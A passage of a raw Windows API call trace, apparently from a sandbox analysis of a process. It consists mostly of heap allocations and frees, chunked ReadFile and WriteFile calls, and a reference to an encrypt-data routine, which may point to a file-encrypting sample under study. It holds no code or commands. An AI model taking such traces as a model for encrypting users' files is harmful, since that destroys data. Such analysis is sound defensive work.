hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0177.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0177.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4220020 | out: hHeap=0x970000) returned 1 [0177.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0177.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0177.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0177.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0177.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0177.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4221020 [0177.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x444d020 | out: hHeap=0x970000) returned 1 [0177.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0177.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0177.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4442020 [0177.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4221020 | out: hHeap=0x970000) returned 1 [0177.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0177.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0177.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0177.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0177.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0177.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0177.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0177.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0177.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0177.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0177.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0177.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0177.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0177.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0177.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0177.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x411d020 | out: hHeap=0x970000) returned 1 [0177.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0177.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0177.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0177.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0177.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0177.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0177.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0177.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0177.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0177.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0177.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0177.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0177.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0177.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0177.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0177.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0177.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0177.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4007020 | out: hHeap=0x970000) returned 1 [0177.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0177.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0177.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0177.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0177.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0177.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4330020 | out: hHeap=0x970000) returned 1 [0177.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0177.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0177.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0177.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0177.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0177.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0177.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0177.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0177.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0177.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0177.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0177.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3efc020 | out: hHeap=0x970000) returned 1 [0177.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0177.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0177.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0177.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0177.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0177.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0177.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0177.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3deb020 | out: hHeap=0x970000) returned 1 [0177.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0177.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0177.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3de3020 [0178.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4442020 | out: hHeap=0x970000) returned 1 [0178.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0178.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0178.025] TranslateMessage (lpMsg=0x8cf708) returned 0 [0178.025] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0178.025] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0178.025] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0178.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0178.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0178.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0178.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0178.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0178.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0178.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0178.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0178.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0178.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0178.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0178.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0178.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0178.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0178.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3ef3020 [0178.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0178.099] WriteFile (in: hFile=0x2d0, lpBuffer=0x3ef3020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3ef3020*, lpNumberOfBytesWritten=0x8cf5e4*=0x100000, lpOverlapped=0x0) returned 1 [0178.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0178.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3ef3020 | out: hHeap=0x970000) returned 1 [0178.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0178.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0178.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0178.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0178.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0178.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0178.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0178.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0178.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0178.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0178.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0178.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0178.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3efd020 [0178.224] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.237] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.239] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.318] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.321] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.324] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.326] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.328] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.330] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.333] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.336] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.338] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.340] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.343] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.345] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0178.348] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0xc00, lpOverlapped=0x0) returned 1 [0178.348] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0178.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0178.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0178.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0178.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0178.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x4004020 [0178.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3efd020 | out: hHeap=0x970000) returned 1 [0178.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0178.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0178.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0178.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0178.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de3020 | out: hHeap=0x970000) returned 1 [0178.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0178.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0178.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x3de1020 [0178.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4004020 | out: hHeap=0x970000) returned 1 [0178.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0178.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0178.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0178.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0178.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0178.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0178.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0178.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x3eea020 [0178.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0178.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3eea020 | out: hHeap=0x970000) returned 1 [0178.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0178.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0178.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0178.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0178.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0178.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0178.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0178.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0178.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0178.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0178.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0178.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0178.647] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0178.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0178.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0178.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0178.647] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0178.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0178.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0178.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0178.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54de8 [0178.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0178.647] RtlAllocateHeap 